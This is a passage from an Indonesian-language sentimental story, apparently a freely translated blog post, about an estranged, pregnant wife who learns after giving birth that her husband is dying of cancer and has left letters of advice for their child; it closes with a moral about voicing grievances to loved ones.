memperhatikan perutku yg agak membuncit. Sambil duduk di kursi, aku
menanda tangani surat itu dan menyodorkan kepadanya.”"Lu Di, kamu
hamil?”" Semenjak nenek meninggal, itulah pertama kali dia berbicara
kepadaku. Aku tidak bisa lagi membendung air mataku yg menglir keluar
dengan derasnya. Aku menjawab:”"Iya, tetapi tidak apa-apa. Kamu sudah
boleh pergi”".Dia tidak pergi, dalam keremangan ruangan kami saling
berpandangan. Perlahan-lahan dia membungkukan badannya ke tanganku, air
matanya terasa menembus lengan bajuku..Tetapi di lubuk hatiku, semua
sudah berlalu, banyak hal yg sudah pergi dan tidak bisa diambil kembali.
“Entah sudah berapa kali aku mendengar dia mengucapkan kata:”Maafkan
aku, maafkan aku”. Aku pernah berpikir untuk memaafkannya tetapi tidak
bisa. Tatapan matanya di cafe itu tidak akan pernah aku lupakan.Cinta
diantara kami telah ada sebuah luka yg menganga. Semua ini adalah sebuah
akibat kesengajaan darinya.


Berharap dinding es itu akan mencair, tetapi yang telah berlalu tidak
akan pernah kembali.Hanya sewaktu memikirkan bayiku, aku bisa bertahan
untuk terus hidup. Terhadapnya, hatiku dingin bagaikan es, tidak pernah
menyentuh semua makanan pembelian dia, tidak menerima semua hadiah
pemberiannya tidak juga berbicara lagi dengannya. Sejak menanda tangani
surat itu, semua cintaku padanya sudah berlalu, harapanku telah lenyap
tidak berbekas.


Kadang dia mencoba masuk ke kamar untuk tidur bersamaku, aku segera
berlalu ke ruang tamu, dia terpaksa kembali ke kamar nenek. Malam hari,
terdengar suara orang mengerang dari kamar nenek tetapi aku tidak
perduli. Itu adalah permainan dia dari dulu. Jika aku tidak perduli
padanya, dia akan berpura-pura sakit sampai aku menghampirinya dan
bertanya apa yang sakit. Dia lalu akan memelukku sambil tertawa
terbahak-bahak. Dia lupa…….., itu adalah dulu, saat cintaku masih
membara, sekarang apa lagi yg aku miliki?


Begitu seterusnya, setiap malam aku mendengar suara orang mengerang
sampai anakku lahir. Hampir setiap hari dia selalu membeli barang-barang
perlengkapan bayi, perlengkapan anak-anak dan buku-buku bacaan untuk
anak-anak. Setumpuk demi setumpuk sampai kamarnya penuh sesak dengan
barang-barang. Aku tahu dia mencoba menarik simpatiku tetapi aku tidak
bergeming. Terpaksa dia mengurung diri dalam kamar, malam hari dari
kamarnya selalu terdengar suara pencetan keyboard komputer. Mungkin dia
lagi tergila-gila chatting dan berpacaran di dunia maya pikirku. Bagiku
itu bukan lagi suatu masalah.


Suatu malam di musim semi, perutku tiba-tiba terasa sangat sakit dan aku
berteriak dengan suara yg keras. Dia segera berlari masuk ke kamar,
sepertinya dia tidak pernah tidur. Saat inilah yg ditunggu-tunggu
olehnya. Aku digendongnya dan berlari mencari taksi ke rumah sakit.
Sepanjang jalan, dia mengenggam dengan erat tanganku, menghapus keringat
dingin yg mengalir di dahiku. Sampai di rumah sakit, aku segera
digendongnya menuju ruang bersalin. Di punggungnya yg kurus kering, aku
terbaring dengan hangat dalam dekapannya. Sepanjang hidupku, siapa lagi
yg mencintaiku sedemikian rupa jika bukan dia?


Sampai dipintu ruang bersalin, dia memandangku dengan tatapan penuh
kasih sayang saat aku didorong menuju persalinan, sambil menahan sakit
aku masih sempat tersenyum padanya. Keluar dari ruang bersalin, dia
memandang aku dan anakku dengan wajah penuh dengan air mata sambil
tersenyum bahagia. Aku memegang tangannya, dia membalas memandangku
dengan bahagia, tersenyum dan menangis lalu terjerambab ke lantai. Aku
berteriak histeris memanggil namanya.


Setelah sadar, dia tersenyum tetapi tidak bisa membuka matanya………aku
pernah berpikir tidak akan lagi meneteskan sebutir air matapun untuknya,
tetapi kenyataannya tidak demikian, aku tidak pernah merasakan sesakit
saat ini. Kata dokter, kanker hatinya sudah sampai pada stadium
mematikan, bisa bertahan sampai hari ini sudah merupakan sebuah
mukjijat. Aku tanya kapankah kanker itu terdeteksi? 5 bulan yg lalu kata
dokter, bersiap-siaplah menghadapi kemungkinan terburuk. Aku tidak lagi
perduli dengan nasehat perawat, aku segera pulang ke rumah dan ke kamar
nenek lalu menyalakan komputer.


Ternyata selama ini suara orang mengerang adalah benar apa adanya, aku
masih berpikir dia sedang bersandiwara…………Sebuah surat yg sangat panjang
ada di dalam komputer yg ditujukan kepada anak kami.”Anakku, demi dirimu
aku terus bertahan, sampai aku bisa melihatmu. Itu adalah harapanku. Aku
tahu dalam hidup ini, kita akan menghadapi semua bentuk kebahagiaan dan
kekecewaan, sungguh bahagia jika aku bisa melaluinya bersamamu tetapi
ayah tidak mempunyai kesempatan untuk itu. Didalam komputer ini, ayah
mencoba memberikan saran dan nasehat terhadap segala kemungkinan hidup
yg akan kamu hadapi. Kamu boleh mempertimbangkan saran ayah.
“”"Anakku, selesai menulis surat ini, ayah merasa telah menemanimu hidup
selama bertahun -tahun. Ayah sungguh bahagia. Cintailah ibumu, dia
sungguh menderita, dia adalah orang yg paling mencintaimu dan adalah
orang yg paling ayah cintai”".

Mulai dari kejadian yg mungkin akan terjadi sejak TK , SD , SMP, SMA
sampai kuliah, semua tertulis dengan lengkap didalamnya. Dia juga
menulis sebuah surat untukku.”"Kasihku, dapat menikahimu adalah hal yg
paling bahagia aku rasakan dalam hidup ini. Maafkan salahku, maafkan aku
tidak pernah memberitahumu tentang penyakitku. Aku tidak mau kesehatan
bayi kita terganggu oleh karenanya. Kasihku, jika engkau menangis
sewaktu membaca surat ini, berarti kau telah memaafkan aku. Terima kasih
atas cintamu padaku selama ini. Hadiah-hadiah ini aku tidak punya
kesempatan untuk memberikannya pada anak kita. Pada bungkusan hadiah
tertulis semua tahun pemberian padanya”".”


Kembali ke rumah sakit, suamiku masih terbaring lemah. Aku menggendong
anak kami dan membaringkannya diatas dadanya sambil berkata: “Sayang,
bukalah matamu sebentar saja, lihatlah anak kita. Aku mau dia merasakan
kasih sayang dan hangatnya pelukan ayahnya”.Dengan susah payah dia
membuka matanya, tersenyum…………..anak itu tetap dalam dekapannya,
dengan tangannya yg mungil memegangi tangan ayahnya yg kurus dan lemah.
Tidak tahu aku sudah menjepret berapa kali momen itu dengan kamera di
tangan sambil berurai air mata………………..

Teman2 terkasih, aku sharing cerita ini kepada kalian, agar kita semua
bisa menyimak pesan dari cerita ini.Mungkin saat ini air mata kalian
sedang jatuh mengalir atau mata masih sembab sehabis menangis, ingatlah
pesan dari cerita ini :”Jika ada sesuatu yg mengganjal di hati diantara
kalian yg saling mengasihi, sebaiknya utarakanlah jangan simpan didalam
hati. Siapa tau apa yg akan terjadi besok? Ada sebuah pertanyaan: Jika
kita tahu besok adalah hari kiamat, apakah kita akan menyesali semua hal
yg telah kita perbuat? atau apa yg telah kita ucapkan? Sebelum segalanya
menjadi terlambat, pikirlah matang2 semua yg akan kita lakukan sebelum
kita menyesalinya seumur hidup.
Diterjemahkan secara bebas oleh aku……………

DiQuote pasarpayon dan roberto

0 komentar